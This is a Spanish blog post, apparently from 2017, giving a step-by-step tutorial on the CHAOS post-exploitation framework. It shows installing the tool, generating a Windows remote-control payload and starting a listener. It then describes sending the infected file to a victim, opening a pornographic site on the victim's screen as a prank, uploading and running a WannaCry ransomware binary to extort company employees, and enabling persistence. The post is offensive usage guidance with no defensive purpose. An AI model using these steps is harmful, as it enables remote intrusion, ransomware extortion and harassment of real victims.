jueves, 7 de septiembre de 2017

CHAOS Framework & Wannacry Attack Windows


Saludos mis queridos fieles lectores en esta oportunidad aprenderemos a manejar el nuevo Framework "Chaos" POST-EXPLOITATION.

¿Que es Chaos Framework? 

Es un generador de Payloads para Windows que nos permite controlar remotamente el sistema de nuestra victima.

Instalamos el requisito Golang para poder ejecutarlo.

root@kali:~# apt install golang upx-ucl -y

Luego descargaremos el repositorio correspondiente.


root@kali:/# git clone https://github.com/tiagorlampert/CHAOS.git

Opciones:

  •  Windows Remote Control
  •  Download File
  •  Upload File
  •  Persistence
  •  Open Url Remotely
  •  Get Operating System Name
  •  Run Fork Bomb

Ejecutando:

root@kali:/CHAOS# go run CHAOS.go

En este escenario nos aparecerá 3 opciones:


  [1] Generate
  [2] Listen
  [3] Quit

  • la primera opción es para crear nuestro Payload.
  • la segunda opción para encender nuestro servidor de escucha.
Ejecutaremos la primera:













Añadimos nuestra IP y nuestro puerto, luego nos aparecerá el siguiente mensaje si  deseamos comprimir nuestro payload en UPX, en este caso le daremos que NO.

Luego nos aparecerá la siguiente linea: Start Listener Now? (Y/n) que nos indica si deseamos iniciar la conexión de escucha, le daremos si.

Nuestro archivo infectado se encuentra en la carpeta CHAOS, se lo enviaremos a nuestra victima mediante cualquier tipo metodología. al ejecutarse el payload nos establecerá la conexión: 

Podemos observar las opciones correspondientes, vamos abrirle una pagina de porno a nuestra victima jajaja.




CHAOS > openurl
Type URL to Open: www.xvideos.com

CHAOS > getos
Name                                                                   
Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2  

Supongamos que el servidor es dedicado de una empresa y un Ciber criminal desea extorsionar a los empleados secuestrando los archivos del ordenador vulnerado mediante un "Ransomware"


CHAOS > upload
File Path to Upload: /root/data.exe
Output name: data.exe

CHAOS > cmd
C:\Users\code7\Downloads>CHAOS > data.exe

Subimos el archivo del Wannacry luego lo ejecutamos por la consola de la victima y listo.

También pueden ejecutar el modulo: persistence enable para tener la persistencia del payload en el sistema.

Saludos :)

0 comentarios:

Publicar un comentario

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares